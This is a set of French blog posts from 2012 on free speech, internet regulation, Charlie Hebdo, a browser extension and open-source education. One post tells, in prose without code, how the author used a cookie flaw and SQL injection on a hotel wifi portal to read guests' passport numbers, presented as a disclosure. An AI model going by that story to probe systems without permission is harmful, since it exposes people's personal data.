La réalité a depuis pris le pas sur la fiction, 12 ans après, lorsqu’une présentatrice de la chaine américaine NBC, Ann Curry, a lancé le mouvement #26acts basé sur le même principe mais appliqué sur 26 gestes de gentillesse en hommage aux 26 victimes de la tuerie. Du haut de son million+ de followers twitter elle a donc réussi à embarquer une quantité assez importante de gens autour de ce principe simple et qui fait du bien par où il passe (littéralement).

Alors c’est peut-être mon côté bisounours mal rasé mais quand j’ai découvert l’initiative j’ai eu un rictus d’enfant innocent et vu dans ma tête la fameuse phrase « faith in humanity restored » qui se fait de plus en plus rare ces derniers temps dans mon crane torturé par l’actualité. J’ai du coup relayé le truc sur twitter pour n’avoir quasiment aucune réaction… Sauf une, de taille :

 

Et là je me dis pourquoi pas ? C’est finalement pas un truc trop compliqué à faire, ça fait du bien autour de soi et même égoïstement ça fait toujours un peu plaisir aussi de faire le bien…

J’ai eu beau chercher sur la toile francophone je n’ai rien trouvé sur le sujet. Il y a donc tout à bâtir et pour une fois on pourrait importer un truc américain intelligent en moins de 2 ans (arrêtez de mettre des converse par contre, c’est laid). Je n’ai pas un million de followers, je ne pourrai pas faire grand chose sans vous alors, êtes vous partants ?

#26acts act 1 : relayer le mouvement en France :)

flattr this!

]]>
Des propos dérangeants sur Twitter ? La faute à l’Internet !http://www.paulds.fr/?p=2456http://streisand.me.thican.net/paulds.fr/index.php?20121229_145459_Des_propos_derangeants_sur_Twitter___La_faute_a_l___Internet__Sat, 29 Dec 2012 13:54:59 +0000Ce fut court, ce fut bref, mais face au déferlement, sur twitter, des hashtags de mauvais gout tour à tour racistes ou homophobes notre gouvernement s’en remet aux bonnes vieilles solutions du précédent : le bouc émissaire Internet.

 

Scéance de rattrapage…

Parce que vous n’étiez probablement pas autant à vous occuper de la France que de vos carrières je me permet de redire ce que moi comme beaucoup avons défendu des années durant, couillons de citoyens que nous sommes, intéressés avant tout par la solution et non par qui la metra en place… Mes chers politiciens (de gauche maintenant, il parait), sachez qu’Internet n’a pas d’identité, pas plus qu’il n’a de conscience, pas plus qu’il n’est mauvais, con ou personifiable. Internet finalement est un outil qui ne prend de sens que lorsque ses utilisateurs s’en saisissent. Il est le reflet de ce que chacun de nous en fait, pas le contraire.

Lorsqu’un con écrit une connerie sur une feuille ce n’est ni la faute du papier ni celle de la plume si le con est con. Si par malheur le con a la bonne idée de photocopier ce papier et l’envoyer par la poste aux 25000 premières adresses des pages jaunes… C’est la faute de qui du coup ? Toujours du con non ?

Alors à quoi bon envisager de contrôler l’incontrôlable ? Pourquoi essayer, avec probablement de bonnes intentions quoi qu’elles fussent tout de même un peu ridicules, de nuir à un des vecteurs principaux de l’économie en cette période de crise, un des seuls moyens d’expression qui donne à tout un chacun la même chance face à l’autre de faire valoir ses idées, un outil de découverte et d’enrichissement culturel personnel et sociétal majeur ?

Parce que c’est la solution la plus simple, celle que l’on peut brandir sur TF1 en prétendant y avoir réfléchi des heures avec les principaux intéressés pour arriver à un paquet surprise DPI : censure et surveillance. Parce que trouver une vraie solution, fut-elle évidente dans ce cas, serait couteux et instruirait les malheureux qui se rendraient compte de la faiblesse du système actuel et du rôle qu’ils pourraient y jouer s’ils passaient moins de temps à s’en remettre à vous, nos chères élites salvatrices ?

La vraie solution passe par une vraie compréhension du problème

S’il y a une recrudescence des propos de ce type sur twitter c’est bien sûr un peu parce que cela semble plus facile… Mais peut-être un peu aussi parce que l’homophobie ou le racisme, et plus largement la confrontation à la différence quelle qu’elle soit, est en recrudescence elle même. Que de plus en plus de gens sont séduits par ces idées ou de moins en moins gênés à les exprimer, publiquement ou non.

Dans les deux cas ce ne sont pas non plus de vrais problèmes au sens le plus libre du terme : jusqu’à preuve du contraire il est autorisé de penser même les plus absurdes conneries et pire encore, de les dire… et c’est même plutôt deux bonnes choses les libertés de pensée et d’expression non ? C’est très triste par contre…

Du coup les interwebz donnent une tribune aux cons aussi. Mais l’avantage de la liberté d’expression est aussi de dévoiler plus vite encore la pensée de certains. Je sais pas vous, mais moi je commence même à trouver cela carrément génial !

Alors quel est le vrai problème ? Mais il est des plus simples : ces haines sont des symptomes elles aussi, des symptomes de choses mais surtout de gens qui vont mal. Comme vous avez trouvé l’Internet comme bouc émissaire, certains ont trouvé les gens différents, les différences, pour passer leurs soucis… C’est même d’une simplicité si enfantine que cela pourrait paraitre intelligent (bon en fait ça l’est pas) !

le chômage ? trop d’immigrés !

trop d’immigrés ? pas assez de français, la faute à ces gays qui se reproduisent pas !

le déficit ? les pauvres dans l’assistanat ou les riches qui s’exilent !

la météo ? Sophie Davant ?!

Et au milieu de tout ça on continue à nous abreuver de merde à la télé, de gossip inintéressant dans les « journaux », et de gamins payés par nos impots à se comporter comme une classe de maternelle au palais Bourbon…

S’il y a un outil par lequel la morosité peut s’évacuer c’est bien le net ! (ou l’exil, encore que je sois pas convaincu que ce soit beaucoup mieux ailleurs… mieux oui, c’est sur le beaucoup que j’ai un doute) Ne nous censurez pas, encouragez nous… Pas trop, je vous vois venir avec vos gros sabots et vos « régulations positives », juste ce qu’il faut pour que la culture puisse s’épanouir, les emplois se créer, les discussions se nouer, … bref déléguer au Net une partie du rôle de la société que vous n’arrivez plus à encourager dans les rues mais qui se fait naturellement sur le réseau.

flattr this!

]]>
Quand un créateur se fait déposséder du droit de partager…http://www.paulds.fr/?p=2449http://streisand.me.thican.net/paulds.fr/index.php?20121218_105930_Quand_un_createur_se_fait_deposseder_du_droit_de_partager___Tue, 18 Dec 2012 09:59:30 +0000Suite à la tuerie de Newtown (sur laquelle je ne reviendrai pas) Michael Moore, connu pour ses positions contre le port d’armes aux USA et particulièrement pour son film Bowling For Columbine qui faisait suite, en 2002 à une tuerie similaire, a encouragé via twitter les internautes à consulter son film uploadé « illégalement » sur Youtube… Sauf que…

Lorsque l’on essaye de clicker sur ledit lien aujourd’hui on a le droit au magnifique message suivant :

This video contains content from mgm and UMG, one or more of whom have blocked it on copyright grounds.

Je vous laisse chercher qui sont MGM ou UMG et imaginer le rôle philosophique, décisionnel, … non je déconne ils ont juste foutu du pognon et comptent bien sur la tuerie récente pour dopper les ventes, le contraire de ce que Moore, qui lui a écrit, réalisé et joué dans son film souhaitait :

Exemple isolé ? Réel renouveau ? L’avenir le dira… Mais pour le moment fait clairement scandaleux à mon humble avis !

flattr this!

]]>
IPFuck est maintenant disponible sur chrome / chromiumhttp://www.paulds.fr/?p=2444http://streisand.me.thican.net/paulds.fr/index.php?20121213_141746_IPFuck_est_maintenant_disponible_sur_chrome___chromiumThu, 13 Dec 2012 13:17:46 +0000Une petite brève pour vous annoncer le portage d’IPFuck sur Chrome / Chromium par @Xafear (qui gagne une mousse pour la peine). Cela faisait un certain temps qu’un certain nombre de personnes l’attendaient (à commencer par moi à vrai dire) et @Xafear l’a fait… Merci à lui donc !

Pour ceux qui n’en ont pas entendu parler avant, IPFuck c’est ce petit outil qui fait chier les developpeurs web et qui m’avait valu pas mal d’incompréhension à sa sortie de sorte que j’ai du ré-expliquer le principe et l’intérêt du bébé.

Aujourd’hui le module sur Firefox (renommé IPFlood à la demande de Mozilla) est utilisé par plus de 14.000 personnes quotidiennement et a été téléchargé plus de 135.000 fois (oui, non moi non plus j’y crois pas).

Bref IPFuck sur Firefox c’est toujours ici : [IPFuck pour firefox]
Et maintenant sur Chrome / Chromium, c’est ici : [IPFuck pour chrome / chromium]

Et pendant que j’ai l’admin de ce blog ouverte je vais en profiter pour vous annoncer aussi la création de Acs Trigger que l’ami @Neosting m’avait demandé il y a un certain temps aussi et qu’il présente mieux que moi ici (indice : accessibilité).

flattr this!

]]>
Peut-on rire de tous, tout, du pire ?http://www.paulds.fr/?p=2428http://streisand.me.thican.net/paulds.fr/index.php?20121014_150726_Peut-on_rire_de_tous__tout__du_pire__Sun, 14 Oct 2012 13:07:26 +0000Peut-on rire de tout ? La question revient de plus en plus ces derniers temps entre les caricatures de Charlie Hebdo il y a quelques semaines, le (bad) buzz du week-end dernier sur Twitter : le hashtag #卐卐卐 finissant en trending topic, puis celui d’aujourd’hui mettant cette fois-ci le hashtag #unbonjuif à la même place…

L’indignation est de rigueur, les gens hurlent (dans les trois cas précédement cités au moins) les articles pleuvent mais il me semble que personne ne prend la mesure de ce dont on parle ici réellement, du « problème » de fond.

Les blagues racistes j’en fait, souvent, elles sont même de celles qui m’amusent le plus (et vous pouvez y aller sur les portugais, j’ai tout entendu) mais je ne permettrai jamais de les faire en public, sur Twitter ou sur mon blog ou n’importe où ailleurs sur le Web qui, pour rappel, est un espace public – et cela est valable aussi si votre compte twitter est protégé ou si l’on parle de facebook et que votre compte y est « protégé »…

Mes blagues racistes (ou pire, ceux qui me connaissent sauront de quoi je parle (épinards ?)) je les réserve au cercle privé, à mes amis, à ceux que je connais et que je sais que je ne vais pas offenser, vexer, blesser… Ceux qui savent qu’il s’agit là de blagues en bonne intelligence et qui souvent me répondront par une autre horreur du même type.

Alors certains vont me dire que je m’autocensure. La réponse est oui, non, les deux mon capitaine. Comme souvent il est impossible de répondre à cette question de façon binaire et heureusement. Je suis venu à l’hacktivisme par la porte de la lutte contre la censure, depuis des années maintenant je travaille sur le sujet ici, ailleurs, partout où je peux être. Cela n’empêche pas de prendre en considération les autres avant d’ouvrir sa gueule.

Reste le cas de Charlie Hebdo et des caricatures. J’ai déjà longuement écrit à ce sujet mais le message que je délivre ici est presque aux antipodes de ce que j’ai écrit à l’époque… Tout simplement parce que Charlie est, normalement, suffisament identifié pour que l’on ne puisse pas les suspecter de faire cela pour blesser, vexer ou offenser (il semble y avoir eu une erreur de calcul à ce niveau mais peu importe, le principe reste bon). Et si demain Charlie déversait le même torrent de conneries que celles que l’on a pu voir fleurir ces deux derniers week-ends sur les juifs personne ne les suspecterai d’avoir une dent contre cette religion en particulier : ils n’aiment personne ! C’est leur rôle !

Loin de créer une élite ayant le droit aux blagues racistes, il me semble qu’ils ont le devoir de lever les tabous et de faire en sorte que l’on vive suffisament bien entre nous pour que l’on puisse demain balancer des blagues sur quelque communauté que cela soit et que personne ne se pose de question sur le fait qu’il s’agit là d’humour et uniquement de cela… Les pauvres, il y a du boulot et je n’aimerai pas être à leur place !

 

flattr this!

]]>
Liberté d’expression, suite ?http://www.paulds.fr/?p=2419http://streisand.me.thican.net/paulds.fr/index.php?20120920_134159_Liberte_d___expression__suite__Thu, 20 Sep 2012 11:41:59 +0000J’ai un peu bâclé mon article d’hier sur l’affaire Charlie Hebdo VS le monde entier pour la simple raison que je n’avais pas poussé ma réflexion assez loin faute de temps. Bien que je continue à soutenir ce que j’ai pu écrire hier, aujourd’hui est un nouveau jour et le temps, comme l’avis de beaucoup de monde lu depuis, me sont parvenus et je souhaite continuer sur le sujet :

Pourquoi cette question ?

Je peux me tromper, cela m’arrive souvent et j’aime cela mais après réflexion la lecture que j’ai de ces caricatures et surtout de la démarche (avouons le tout de suite : lesdits dessins sont loin d’êtres les meilleurs publiés dans le journal) est la suivante :

On parle ici de gens intelligents, sachant très bien à quoi ils s’exposent en publiant des dessins de ce type dans ce contexte, qui le font sous prétexte de la liberté d’expression. Mais plus que la démarche, ce sont les réactions qu’il faut regarder…

La classe politique est divisée, les médias y vont de leur commentaire, les twittos hurlent qui à l’outrage, qui a l’encouragement, … Bref on aime, on déteste, on manifeste le fait que l’on va l’ignorer… Mais on en parle !

Et bordel ce que ça fait du bien de parler ! D’aborder un sujet, d’essayer d’avancer sur ledit sujet et pour certains de se révéler dans la précipitation (comme je l’ai fait hier – mea culpa).

D’un tabou stérile émergent des compromis, certains sortent d’une auto-censure désavouée pour soutenir la cause de Charlie et d’autres se révèlent plus cons encore que l’on ne le pensait (j’ai le droit, elle a dit qu’elle était pour la liberté d’expression).

Etrangement, les commentaires sous les articles de la presse grand-public (lisez-les c’est souvent ce qu’il y a de plus instructif) sont bien moins stupides que d’habitude, les gens revendiquent un avis, l’étayent et ne se réfugient pas dans une posture pré-conçue par un parti. En fait ceux dont l’avis est le moins construit sont justement les politiques !

Malheureusement beaucoup se sont aussi sentis offensés par la démarche de Charlie et j’ai lu aussi avec beaucoup d’attention toutes ces manifestations de tristesse, dégout, colère… Mais jamais de haine, déraison, …

Plus les publications affluent et plus je me dis que la liberté d’expression (ou de blasphémer comme disent certains) a été utilisée en prétexte à l’ouverture d’un débat, de discussions qui pourraient tous nous rapprocher, permettre à certains de connaitre l’islam par un autre prisme que le JT de TF1 et ses amalgames douteux…

On nous avait promis la fin du monde après la publication de ces dessins, et si on leur donnait tort et qu’on essayait d’avancer à la place. Pour que ces caricatures ne soient pas les dernières mais le point charnière qui marquerait le passage à une société où l’on ne craint pas ce qui est différent et l’on vit avec et de nos différences, ensemble !

A bon entendeur !

EDIT: Le monde a réalisé une interview de Charb et d’une partie de la rédaction qui me semble aller dans le sens que je décris ici.

flattr this!

]]>
Charlie Hebdo, prophète de la liberté d’expression ?http://www.paulds.fr/?p=2415http://streisand.me.thican.net/paulds.fr/index.php?20120919_115554_Charlie_Hebdo__prophete_de_la_liberte_d___expression__Wed, 19 Sep 2012 09:55:54 +0000Ce matin j’ai, comme beaucoup je pense, acheté la dernière édition du journal satirique Charlie Hebdo. Je l’ai feuilleté et ai publié une photo sur Twitter qui a été reprise un certain nombre de fois. L’heure est venue d’expliquer pourquoi et dans quelle mesure je soutiens (ou pas) la démarche du journal.

D’abord je vais clarifier un point tout de suite pour les lecteurs qui tomberaient sur cet article sans avoir rien lu de moi par le passé : je ne suis pas raciste, je me fous de la religion, mais respecte toute croyance et tout croyant. Je ne veux pas m’ériger en donneur de leçon ou prétendre apporter un point de vue qui mette tout le monde d’accord – juste le mien, dans toute mon humilité.

Est-ce que ces caricatures (bon enfant, mais mises dans le contexte actuel plutôt graves) étaient nécessaires ? La réponse à cette question ne peut tenir en un « oui » ou un « non » – quel que soit le point de vue.

D’un côté nous avons une figure sacrée pour une part considérable de la population et dont la représentation (par un croyant !) est interdite. De l’autre la peur de tomber dans le tabou pour tous. Doit-on respecter les croyances de tous : oui. Doit-on s’interdire ce que d’autres se sont interdit : non, à moins d’être convaincu soi-même.

Le risque au final, du point de vue du journal, est de tomber dans un obscurantisme qui brimerait une partie de la population pour en respecter une autre. La démocratie pure et appliquée comme un robot voudrait en effet que celui qui gagne est celui qui est le plus nombreux : « les musulmans ne sont pas 51% de la population donc on peut y aller ! » – Ce serait bien sûr débile…

A l’inverse je comprends ceux qui pourraient se sentir offensés par ces images et mises en scène mais les supplie de lire l’encart publié justement ce matin qui précise bien à qui se destinent ces caricatures : aux extrémistes et aux obscurantistes.

Si d’autres se sont senti offensés par la démarche ou les dessins c’est que Charlie a raté son coup ou que ces autres n’ont pas accordé assez d’attention au contexte dans lequel étaient publiées ces images.

Je connais nombre de musulmans qui sont les premiers à être désespérés par les dérives de gens qui disent partager la même foi qu’eux et qui, au nom de cette foi, vont commettre des actes qui résultent uniquement en une « diabolisation » de tous les croyants et leurs croyances…

Bref, le débat est ouvert sur la question du « fallait-il » – pour ma part je pense que oui, il était du devoir de Charlie Hebdo de revendiquer sa ligne éditoriale et de ne pas se laisser condamner par le tabou quitte à offenser au passage certains qui ne sont pas visés mais auraient mal compris le message.

Le seul bémol que j’apporterai à ceci est que cela ne devrait pas être vendu, mais distribué gratuitement, sur Internet par exemple, pour éviter que le journal ne soit taxé de choquer pour gagner de l’argent…

flattr this!

]]>
We don’t need no regulationhttp://www.paulds.fr/?p=2406http://streisand.me.thican.net/paulds.fr/index.php?20120822_164913_We_don___t_need_no_regulationWed, 22 Aug 2012 14:49:13 +0000Depuis ce matin la nouvelle qui défraie la chronique de notre microcosme est ce rapprochement qui apparait désormais de plus en plus certain du CSA et de l’ARCEP dans le but de réguler Internet.

Des alternatives intéressantes sont proposées de ci de là, mais toutes ont le même défaut : elles partent du principe qu’Internet a besoin de régulation.

Je m’inscris en faux sur ce point et trouve cette approche dangereuse à court ou moyen terme. La régulation implique le contrôle et le contrôle sur la liberté d’expression absolue comme mesurée n’est jamais très bon, surtout lorsqu’exercé par l’Etat. Des exemples à l’étranger mais aussi en France sont malheureusement là pour comforter cette position…

A l’inverse, ce qui menace réellement Internet, en ce moment et depuis quelques années, c’est justement ce contrôle, cette centralisation et la censure ou les atteintes à la concurrence qui en découlent. Ce sont les lobbys qui pour défendre des intérêts privés font plier les politiques au détriment de la majorité. Ce sont les pays qui ont le contrôle sur leur Internet et s’en servent pour traquer des opposants…

La réponse à celà est évidente : la neutralité du Net. Cette réponse est déjà sur le bureau de ceux qui aujourd’hui envisagent le chemin inverse et mettent ainsi en péril à la fois notre liberté mais aussi un pan chaque jour plus considérable de l’économie.

Aussi aujourd’hui je vous propose de faire passer un message et de clamer haut et fort votre refus de voir votre outil de travail, votre lieu d’expression, d’accès à l’information, … censuré, contrôlé, démantelé par un Etat déjà beaucoup trop présent dans tous les autres vecteurs qui permettent d’accéder à une fraction de ce que permet Internet. Je vous propose simplement de dire non, nous n’avons pas besoin d’être régulés…

Dès ce soir je vais faire parvenir un exemplaire papier du célèbre livre libre Temporary Autonomous Zone - par Hakim Bey (à lire si vous ne l’avez pas déjà fait) au ministère et à destination de Fleur Pellerin. Je vous encourage à faire de même afin de nous assurer que lecture en soit faite et que la décision qui découlera de ces consultations soit éclairée par un point de vue alternatif…

Pour ce faire rien de plus simple, commandez le livre en ligne (il est libre donc ne coute pas très cher) et faites le livrer à :

Ministère du Redressement productif
A l’attention de Fleur Pellerin
139, rue de Bercy
75572 Paris Cedex 12

Avec un peu de chance on aura le droit à une twitpic… et une décision éclairée ?

NB : article écrit en écoutant une certaine chanson de Pink Floyd ayant inspiré le titre…

Edit : done :

flattr this!

]]>
Alerte aux pédophiles sur Twitter…http://www.paulds.fr/?p=2400http://streisand.me.thican.net/paulds.fr/index.php?20120810_110104_Alerte_aux_pedophiles_sur_Twitter___Fri, 10 Aug 2012 09:01:04 +0000Hier un compte diffusant des photos de nature pédopornographiques a beaucoup circulé sur Twitter, ce matin deux nouveaux comptes du même acabit sont en train de collectionner les mentions.

Dans la foulée j’ai reçu moi-même plusieurs mentions et messages privées me demandant de signaler le compte comme spam et de tweeter pour que d’autres le signalent… Ce que je n’ai pas fait.

Depuis plus de dix ans que je traine ma carcasse sur le Net, en explorant parfois les bas-fonds, c’est la 4ème fois que je tombe sur ce type de contenus, la première sur un site grand public.

Chaque fois le choc est le même et j’en arrive à ressentir des nausées. Mais celà n’est en aucun cas une raison pour réagir à l’émotion. Sur un sujet aussi sensible que celui-ci c’est potentiellement mettre des gens en danger, des enfants, c’est se résoudre à ses pulsions animales et à la loi du Talion. Nous, mais plus important encore, les victimes, méritons mieux que cela.

Partant de là ce qu’il faut faire est relativement simple :

- Signaler le contenu à twitter dans ce cas (cp@twitter.com – adresse dédiée à ce type de contenu)
- Le signaler à la police via le portail dédié
- Eloignez vos enfants du réseau le temps que le compte soit désactivé…
- Si vous même êtes choqué, en parler (j’y reviens)

Ce qu’il ne faut surtout pas faire en revanche c’est relayer le message de façon publique, en appelant à signaler le compte. Vous prennez le risque d’exposer plus sensible que vous et vous faites de la publicité à ces gens…

Une fois que des mesures ont été prises (et vous voyez plus haut que de vraies solutions existent) il est sain d’en parler.

Tout ce qui existe, quel que soit son niveau d’horreur, ne doit jamais devenir un tabou. C’est le meilleur moyen d’ignorer la réalité et d’agir comme si elle n’existait pas. Cacher les choses et faire comme si elles n’existaient pas ne changera rien au sort des gamins en question – des enquêtes, condamnations et prises en charges psychiatriques oui…

A cet effet, et je suis « obligé » de faire ce parallèle, la loi LOPPSI II art 4, supposée protéger les enfants d’une exposition comme celle qui a eu lieu hier et a lieu en ce moment, n’est d’aucune utilité. Twitter a réagit comme il le devait, rapidement (ce ne sera jamais assez rapide, mais il faut relativiser et jamais le ministère de l’intérieur n’aurait réagi aussi vite) et il y a fort à parier qu’une enquête a été ouverte dans plusieurs pays vu le nombre de signalements que j’ai pu voir hier.

flattr this!

]]>
Trouver la liste des passeports des résidents d’un hotel via un hotspot wifi…http://www.paulds.fr/?p=2393http://streisand.me.thican.net/paulds.fr/index.php?20120729_173437_Trouver_la_liste_des_passeports_des_residents_d___un_hotel_via_un_hotspot_wifi___Sun, 29 Jul 2012 15:34:37 +0000En ce début d’année j’ai eu la chance d’être invité au 4mTunis qui avait lieu dans un bel hôtel de la capitale Tunisienne. L’organisation était parfaite à un détail près : le wifi de l’hôtel était saturé, et bien vite les accès réservés aux invités et conférenciers se sont retrouvés ne plus fonctionner. La direction de l’hôtel n’arrivant pas à trouver de solution, on a cherché et trouvé tout à fait autre chose…

Le système de hotspot était basé sur un logiciel open-source (ez-radius) modifié pour que la reconnaissance d’un utilisateur se fasse sur un couple numéro de passeport / numéro de chambre. En fonction de ces identifiants on pouvait commander du temps de surf et se le voir imputé sur la facture de la chambre.

Une fois connecté il fallait conserver une page ouverte décrivant le statut de la connexion (portail captif)… Et c’est sur cette page que nous avons pu jouer avec les amis de Telecomix TN, du Parti Pirate TN et du hackerspace de façon générale…

En utilisant un cookie mis en place par le portail et mal vérifié à sa ré-utilisation par l’application nous avons eu accès à la base de données…

Grâce à une (relativement) simple injection SQL nous avons donc pu mettre la main sur la liste des numéros de passeport de tous les gens résidant à l’hôtel à ce moment (parmi lesquels les fondateurs de Mediapart ou Rue89 invités aussi) et depuis la création du système… Avec le numéro de chambre et les dates de séjour correspondantes.

Pire encore : il est techniquement possible de relier ces informations  à l’historique de  navigation et de surveiller ainsi la totalité de l’activité dudit hôtel (et peut-être d’autres utilisant le même système dans cette chaîne ou des systèmes similaires dans d’autres) sur Internet.

Il va de soit que nous n’avons pas touché aux données et n’avons rien sauvegardé.

Petit conseil donc, lorsque vous êtes à l’hôtel, même en France, pensez à chiffrer tout votre trafic…

Photo par @eon01

flattr this!

]]>
De l’open source au programme d’écoles supérieures en informatique ?http://www.paulds.fr/?p=2383http://streisand.me.thican.net/paulds.fr/index.php?20120702_144104_De_l___open_source_au_programme_d___ecoles_superieures_en_informatique__Mon, 02 Jul 2012 12:41:04 +0000OK, je l’ai encore fait, j’ai encore trollé… Samedi je disais sur Twitter que la porte de mes toilettes est décorée d’un panneau Epitech (c’est le cas, vous aurez une photo si vous êtes sages) et forcément dans la foulée j’ai reçu plusieurs mails me demandant pourquoi, ce que je reprochais à cette école et même un me demandant si il devait choisir une autre école finalement.

Alors je vous rassure : non je n’ai rien contre Epitech en soit, à vrai dire je m’en fiche…

Ce qui me gêne plus c’est le cursus général de l’informatique supérieure qui a tendance à former des bataillons de chefs de projet technico-fonctionnels (ce qui ne correspond pas au besoin du marché en passant hein !) et qui le fait par une pluie de connaissances dictées et normalisées par des années de recherches super intéressantes sur la théorie de la relativité du peut-être des besoins des entreprises pas représentatives du marché d’il y a 20 ans…

J’abuse : à la fin des études en général on met l’étudiant en stage pour qu’il voit comment ça se passe dans la vraie vie (qu’il réalise qu’il a payé 5 ans d’étude pour apprendre des conneries).

Gâchis extraordinaire s’il en est lorsque l’on sait qu’il y a un secteur du logiciel (au sens large) fondamental sur les interwebz et ailleurs qui manque toujours de ressources et qui est le plus formateur : l’open source.

Partant de là pourquoi ne pas ajouter un peu d’open source à ces études, pourquoi même ne pas calquer le déroulé pédagogique dessus ?

Coder pour les autres

L’un des intérêts principaux de cette proposition réside dans la rigueur et la qualité qui découle de projets voués à être diffusés de la sorte.

Il m’est arrivé de coder des trucs à l’arrache, sur le pouce, pour des besoins spécifiques personnels. A l’inverse lorsque j’ai fait des propositions de modification pour des fonctionnalités avancées de Prestashop (utilisé sur 100.000 boutiques à l’époque) j’ai pris plusieurs heures pour faire des vérifications dans tous les sens, des tests de régression, des vérifications sur l’environnement (mes modifications ne risquent-elles pas d’impacter des modules third-party ?)…

La qualité du code sortie est aussi beaucoup plus propre et on apprend à se servir d’outils assez formidables que jamais personne ne vous fera voir en école d’ingénieur actuellement (trouvez moi un cursus PHP avec du PHPCS, PHPMD, PHPUnit, …) pour valider son code de façon industrielle… Avouez que d’un coup ça donne une autre gueule aux TPs !

Travailler en équipe(s)

Puisque l’on parle d’outils justement, une des caractéristiques les plus intéressantes de l’open-source (vu sous cet angle de l’apprentissage) est sa capacité à réunir des dizaines de compétences autour d’un projet via des outils, des process, au delà souvent même de la barrière des langues. Ah oui parce que bon, les ingénieurs BAC+5 en informatique qui ne parlent pas anglais non plus ce n’est pas une réalité du marché…

J’ai vu des équipes en entreprise comme dans le monde de l’open-source essayer de trouver la meilleure suite d’outils pour communiquer, s’organiser, partager le code… A la sortie d’une école vous devriez maitriser les principaux et en connaitre quelques exotiques. Cette exhaustivité n’existe que dans le monde open-source. Dans le monde de l’entreprise (tu sais, ton stage de fin d’année) vous serez formé à une techno (SVN + Mantis + mail au hasard) et pas plus…

Toujours être à la pointe

Ah oui la veille… Bon on va pas se leurrer, si vous faites une école d’info normalement c’est pour être tranquille en émargeant à 50k€ en junior avec un CDI et des tickets resto…

Ou pas : normalement lorsque l’on arrive à ce niveau on est avant tout un passionné, quelqu’un qui veut chercher à connaitre plus que ce qu’il va utiliser potentiellement, chercher à comprendre comment fonctionne ce qu’il utilise au quotidien, découvrir de nouveaux outils lui permettant de travailler plus efficacement ou moins, …

Bref ça demande d’être capable de faire de la veille technologique, de savoir analyser un produit lorsqu’on le découvre et être capable de prendre une décision rapide sur son intérêt ou pas à l’intégrer dans tel ou tel projet.

Tout cela on peut savoir le faire de façon innée, on peut l’apprendre de façon théorique mais là encore il n’y a que dans l’open-source, avec ses collaborations de toutes part, que j’ai vu son efficacité atteindre son paroxysme. Il n’y a que dans l’open-source où j’ai vu des équipes s’organiser pour analyser l’existant concurrent, les autres produits éventuellement intégrables et prendre des décisions par rapport à tout ceci pour faire évoluer un produit sans pour autant s’astreindre à la durée d’un sprint scrum (private-troll !!!).

Contribuer à quelque chose (de grand)

Et pour finir, non sur le moins pire (last but not least quoi), le monde de l’open-source est très ouvert : vous pouvez demain contribuer à un projet qui a déjà des centaines de milliers d’utilisateurs. Sur le principe c’est génial pour tous les points évoqués plus haut et pour le produit et ses utilisateurs en eux-même à qui vous avez probablement rendu service en contribuant à la réussite dudit projet.

Mais il y a un autre point intéressant à cela : le CV. Un recruteur préférera (théoriquement hein, si vous postulez chez Crosoft ça marche plus… mais si c’est le cas quittez ce blog) voir des noms de gros et / ou beaux projets tout au long de votre cursus universitaire (voire avant et après dans l’idéal) que vos trois mois de stages à la DSI de Leclerc Bourgogne (comme pour Epitech, rien contre eux).

flattr this!

]]>
Merci à vous doux terroristes des interwebzhttp://www.paulds.fr/?p=2379http://streisand.me.thican.net/paulds.fr/index.php?20120626_121611_Merci_a_vous_doux_terroristes_des_interwebzTue, 26 Jun 2012 10:16:11 +0000Je viens de passer un mois bien rempli avec notamment les RSSIL (Maubeuge), Pas Sage en Seine (la cantine) et la Nuit du Hack (Marne la Vallée) et comme à chaque fois que je suis pris par autant d’évènements j’en arrive à réfléchir sur comment j’en suis arrivé là. En février 2009 je créais mon compte Twitter, en mai 2009 j’ouvrais ce blog avec le même objectif dans les deux cas : me faire plaisir en écrivant, en partageant. Trois ans que ça dure, … ça valait bien un billet d’humeur / mylife pour une fois !

Quand je regarde un peu mon parcours, quand on me demande quelles études j’ai fait la seule chose qui me vienne à l’esprit est que sans Internet ma vie serait bien différente, bien morne. Depuis que j’ai 15 ans je travaille, d’abord à droite à gauche dans des rédactions diverses et variées de journaux papier et web – job que j’avais eu en participant sur le forum d’un journal d’ailleurs.

Puis j’ai appris à coder – sur internet pour changer – et à la fin de mon DUT je me suis lancé, j’ai créé ma société MMIX Productions. A l’époque j’avais codé et mis en place un portail d’annonces immobilières dont les bénéfices devaient servir à financer des associations qui réabilitent des logements sociaux. J’avais créé mon propre emploi, je faisais travailler jusqu’à trois personnes avec moi, mais le secteur étant ce qu’il est et mon réseau étant bien maigre à l’époque, j’ai fermé cette entreprise et ai fait tout ce que tout informaticien diplômé au chômage et ruiné envisage une fois dans sa vie : j’ai rejoint une SSII…

C’est à cette époque là que j’ai créé ce blog et mon twitter, à cette époque que mon militantisme latent s’est peu à peu imposé à moi. Que vous me l’avez imposé en me lisant, en me diffusant, en m’aidant à regarder plus loin toujours que ce j’aurai pu faire seul. Le point charnière, si je devais en désigner un, est cet article sur Wawa-Mania qui m’a valut de rencontrer la crème de l’hacktivisme français. A partir de là ça ne s’est plus jamais arrêté.

C’est en mangeant avec Serge Soudoplatoff, entre deux discussions sur les labs qu’il avait rejoint à l’époque pour les quitter depuis, que celui-ci m’a proposé de m’obtenir un rendez-vous à l’Hetic, école dans laquelle il enseigne. J’y ai donné des cours et continue aujourd’hui encore.

Ce point supplémentaire sur mon CV m’a permis d’obtenir un poste de formateur professionnel chez Alterway Formation où j’ai probablement plus appris qu’enseigné. C’était un peu le but à mes yeux.

Et c’est enfin sur mon blog que j’ai publié une annonce expliquant que je cherchais du travail le jour où j’ai eu envie de revenir plus proche du code. Cet article a été visionné et partagé un nombre de fois que je n’imaginais pas en le publiant, des entreprises très intéressantes m’ont approché et j’ai fini chez CCM Benchmark où je suis aujourd’hui, heureux.

De quoi demain sera fait je ne peux le dire, ce que je vois c’est aujourd’hui et hier. Ce que je vois c’est la part extraordinaire qu’Internet a pris dans ma vie et ce que cet outil en a fait, ce que vous en avez fait.

Et pour cela je ne vous remercierai jamais assez !

PS: J’oublie plein de choses dans l’article : mon livre, mon taff de consultant indépendant, ma découverte de certains artistes, des amis, des voyages, des soirées et moments inoubliables, …

flattr this!

]]>
